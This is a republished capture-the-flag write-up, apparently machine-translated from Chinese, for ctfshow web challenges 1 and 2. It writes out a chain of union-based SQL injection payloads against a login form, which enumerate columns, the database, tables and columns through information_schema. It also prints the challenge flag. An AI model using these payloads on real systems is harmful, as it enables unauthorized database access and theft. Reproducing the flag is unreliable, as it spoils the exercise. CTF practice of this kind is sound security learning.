当前位置:网站首页>ctfshow web 1-2

ctfshow web 1-2

2022-06-12 08:17:00 hint=flag

ctfshow web 1-3
The first question is the sign in question
 Insert picture description here
When I open the link
 Insert picture description here
Look at the source code :
 Insert picture description here
Found a comment
base64 decode :
 Insert picture description here
web2
 Insert picture description here Open the link :
 Insert picture description here
It's a login interface , Guess yes sql Inject :
 Insert picture description here
Try to inject points

With echo , The explanation can sql Inject
Number of blasting injection points :
admin’ union select 1,2,3#
 Insert picture description here
There are three injection points
Blasting database name :
admin’ union select 1,database(),3#
 Insert picture description here
The database name is web
Joint query table name :
admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
 Insert picture description here There are two tables. flag and user
guess flag It's just flag Inside this watch
On Blasting flag This table :
The joint query :admin’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#
 Insert picture description here Only flag A list of data
Query this column of data :
admin’ union select 1,flag,3 from flag#
 Insert picture description here Echo directly flag
ctfshow{ef340bd6-5a61-4adc-a889-469bb6e31482}

原网站

版权声明
本文为[hint=flag]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/163/202206120807540443.html